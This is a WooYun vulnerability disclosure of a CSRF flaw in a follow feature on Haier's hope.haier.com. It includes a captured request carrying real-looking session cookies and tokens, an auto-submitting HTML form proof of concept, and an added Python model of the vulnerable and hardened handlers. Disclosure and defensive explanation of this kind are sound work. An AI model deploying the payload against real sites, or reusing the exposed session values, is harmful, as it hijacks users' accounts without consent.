WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online --------http://drop.zone.ci/
2015-01-04: Details notified to the vendor, awaiting vendor handling
2015-01-05: Vendor confirmed; details disclosed to the vendor only
2015-01-15: Details disclosed to core white hats and experts in the relevant field
2015-01-25: Details disclosed to ordinary white hats
2015-02-04: Details disclosed to intern white hats
2015-02-18: Details disclosed to the public
A sleeping lion
http://hope.haier.com/ The problem is in the follow feature, which has no protection at all, so CSRF is possible: http://hope.haier.com/topic/other/topicBoddys. The endpoint accepts a plain form-encoded POST whose only parameter is to_user_id, is authenticated by the session cookie alone, and carries no anti-CSRF token and no check of where the request came from; a page on any other site can therefore make a logged-in user follow an arbitrary account.
POST /topic/other/topicBoddys HTTP/1.1
Host: hope.haier.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://hope.haier.com/group/group/detail/id/280.html
Content-Length: 18
Cookie: hope_lang=cn; PHPSESSID=t18mimkfk1nu2q1jp5bpm8auj2; Hm_lvt_1f3b513b6138cd211c24da6734bf74e9=1420119608; Hm_lpvt_1f3b513b6138cd211c24da6734bf74e9=1420120139; ZXKJSESSIONID=857c2ccb-adf8-0b9c-2df4-061a1dee8075***1; UniqueName=857c2ccb-adf8-0b9c-2df4-061a1dee8075; trsidsssosessionid=7119059F52694E98D4BE2296864BCB08-10.159.63.81; __utma=96306309.1406874401.1420119880.1420119880.1420119880.1; __utmb=96306309.5.10.1420119880; __utmc=96306309; __utmz=96306309.1420119880.1.1.utmcsr=hope.haier.com|utmccn=(referral)|utmcmd=referral|utmcct=/group/group/detail/id/280; __utmt=1; _acxm=d2a49033-763e-430f-867a-21ad08edf549; _gscu_1690714239=20119879h79bx040; _gscs_1690714239=201198792nmr4g40|pv:5; _gscbrs_1690714239=1; _gscu_345248242=20119879kqp7hu40; _gscs_345248242=20119879oi2izo40|pv:5; _gscbrs_345248242=1; SummerSummer321djs=120; idsALInfo=f20ea47283ea0da8bf54c69ae1ba2c3f13dbd828727f4349aa717db8735e32d581cce431a65c4aaee5879b7cf35d3928be92885d156d0503b7ae719d7a5b56e6b7e1c4ed248b497ba22184fd44ab3bb81b0527980a13a3edecb0aee7da97f163_1d1cb40960053ab00945ab793cceaacc; idsALUserSource=""; trsidssdssotoken=7119059F52694E98D4BE2296864BCB08-10.159.63.81_1420163180145; haieruser=SummerSummer321; haierbbsuser=SummerSummer321; bdshare_firstime=1420120043951
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

to_user_id=1600655
POC:
<html>
<body>
  <!-- Form targeting the follow endpoint; the browser attaches the victim's hope.haier.com cookies automatically -->
  <form id="demo" name="demo" action="http://hope.haier.com/topic/other/topicBoddys" method="POST">
    <input type="text" name="to_user_id" value="1600655" />
    <input type="submit" value="submit" />
  </form>
  <script>
    // Auto-submit on page load so no click from the victim is needed
    document.demo.submit();
  </script>
</body>
</html>
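To make the root cause and the fix concrete, here is an added example (not code from the WooYun report or from Haier's site, whose real implementation is unknown): a Python model of the follow handler as the report describes it, beside a hardened version. The session store, the assumed site origin, the `csrf_token` field name and the attacker host are all constructed for illustration; `PHPSESSID` and `to_user_id` are taken from the captured request.

```python
"""Added example, not from the WooYun report or Haier's code: a model of the
/topic/other/topicBoddys follow handler as reported, next to a hardened one.
The session store, site origin, csrf_token field name and all request data
below are constructed for illustration."""
import hmac
import secrets
from urllib.parse import parse_qs, urlparse

SITE_ORIGIN = "http://hope.haier.com"  # assumed site origin
SESSIONS = {}   # session id -> {"user_id": int, "csrf": str}; stand-in for PHP sessions
FOLLOWS = set() # (follower_id, followed_id)


def create_session(user_id):
    """Log a user in: mint a session id plus a per-session CSRF token."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"user_id": user_id, "csrf": secrets.token_urlsafe(32)}
    return sid


def parse_cookies(header):
    """Minimal Cookie header parser: "a=1; b=2" -> {"a": "1", "b": "2"}."""
    cookies = {}
    for part in header.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            cookies[name] = value
    return cookies


def session_from(headers):
    sid = parse_cookies(headers.get("Cookie", "")).get("PHPSESSID")
    return SESSIONS.get(sid)


def follow_vulnerable(headers, body):
    """Behaviour described in the report: a valid session cookie is the only
    requirement, so a form auto-submitted from any site is honoured."""
    sess = session_from(headers)
    if sess is None:
        return 401, "login required"
    to_user = parse_qs(body).get("to_user_id", [""])[0]
    if not to_user.isdigit():
        return 400, "bad to_user_id"
    FOLLOWS.add((sess["user_id"], int(to_user)))
    return 200, "followed"


def follow_hardened(headers, body):
    """Same endpoint with two independent CSRF defences:
    1. the browser-set Origin (or Referer) must be the site itself;
    2. the form must carry the synchronizer token stored in the session.
    The PoC page hosted on an attacker's site fails both."""
    sess = session_from(headers)
    if sess is None:
        return 401, "login required"
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return 403, "missing Origin/Referer"
    u = urlparse(source)
    if f"{u.scheme}://{u.netloc}" != SITE_ORIGIN:
        return 403, "cross-site request"
    form = parse_qs(body)
    token = form.get("csrf_token", [""])[0]
    # Constant-time comparison; encode so non-ASCII input cannot raise TypeError.
    if not hmac.compare_digest(token.encode(), sess["csrf"].encode()):
        return 403, "bad csrf token"
    to_user = form.get("to_user_id", [""])[0]
    if not to_user.isdigit():
        return 400, "bad to_user_id"
    FOLLOWS.add((sess["user_id"], int(to_user)))
    return 200, "followed"


def demo():
    """Replay the PoC against both handlers, then a legitimate same-site request."""
    sid = create_session(1001)  # constructed victim account
    cookie = f"hope_lang=cn; PHPSESSID={sid}"
    # What the victim's browser sends when the PoC page auto-submits its form:
    # cookies attached automatically, Origin/Referer pointing at the attacker.
    poc_headers = {"Cookie": cookie, "Origin": "http://attacker.example",
                   "Referer": "http://attacker.example/poc.html"}
    poc_body = "to_user_id=1600655"
    from_vuln = follow_vulnerable(poc_headers, poc_body)
    from_hard = follow_hardened(poc_headers, poc_body)
    # Same-site form that the server rendered with this session's token.
    good_headers = {"Cookie": cookie, "Origin": SITE_ORIGIN}
    good_body = f"to_user_id=1600655&csrf_token={SESSIONS[sid]['csrf']}"
    legit = follow_hardened(good_headers, good_body)
    return from_vuln, from_hard, legit


if __name__ == "__main__":
    print(demo())
```

The token is the primary control: a browser may omit Referer under privacy settings and older browsers did not send Origin on form posts, so an origin check on its own can both reject legitimate users and miss attackers, but it is a cheap second layer that also blocks a token-less request before any session-bound work happens. Marking the session cookie `SameSite=Lax` (not available to browsers in 2015) adds a third, client-enforced layer for the same class of cross-site form post.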
Severity: Medium
Vulnerability Rank: 6
Confirmed: 2015-01-05 17:41
Thanks to Summer of the WooYun platform for the testing and the reminder; we have assigned staff to handle it.
None yet